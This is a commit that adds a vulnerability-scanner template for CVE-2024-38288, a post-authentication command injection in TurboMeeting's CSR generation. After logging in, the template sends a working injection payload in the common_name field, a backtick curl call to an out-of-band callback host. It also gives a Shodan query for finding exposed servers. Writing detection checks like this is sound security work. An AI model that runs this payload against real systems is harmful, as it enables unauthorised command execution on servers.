Create CVE-2024-38288.yaml

2024-07-30 14:46:36 +05:30 · 2024-07-30 14:46:36 +05:30 · 74e3f82630
parent fbc0fa8c77
commit 74e3f82630
1 changed files with 72 additions and 0 deletions
--- a/http/cves/2024/CVE-2024-38288.yaml
+++ b/http/cves/2024/CVE-2024-38288.yaml
@ -0,0 +1,72 @@
+id: CVE-2024-38288
+
+info:
+  name: TurboMeeting - Post-Authentication Command Injection
+  author: rootxharsh,iamnoooob,pdresearch
+  severity: high
+  description: |
+    The Certificate Signing Request (CSR) feature in the admin portal of the application is vulnerable to command injection. This vulnerability could allow authenticated admin users to execute arbitrary commands on the underlying server by injecting malicious input into the CSR generation process. The application failed to properly sanitize user-supplied input before using it in a command executed privileges.
+  reference:
+    - https://github.com/google/security-research/security/advisories/GHSA-gx6g-8mvx-3q5c
+    - https://www.rhubcom.com/v5/manuals.html
+  classification:
+    epss-score: 0.00043
+    epss-percentile: 0.09357
+  metadata:
+    verified: true
+    max-request: 2
+    shodan-query: html:"TurboMeeting"
+  tags: cve,cve2024,rce,turbomeeting,authenticated
+  
+variables:
+  username: "{{username}}"
+  password: "{{password}}"
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        POST /as/wapi/login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        next_path=%2Fas%2Fwapi%2Fprofile_entry&Email={{username}}&Password={{password}}&submit=Login
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "as/wapi/profile_entry?sid="
+        internal: true
+
+    extractors:
+      - type: regex
+        name: sid
+        part: body
+        group: 1
+        regex:
+          - 'sid=(.*?)"'
+        internal: true
+
+  - raw:
+      - |
+        @timeout: 20s
+        POST /as/wapi/generate_csr HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        sid={{sid}}&common_name=1"%20out%20/dev/null"`curl%20{{interactsh-url}}`&company_name=1&state=1&city=1&country=US&submit=Generate+CSR
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - CSR
+          - SSL
+
+      - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
+        words:
+          - "dns"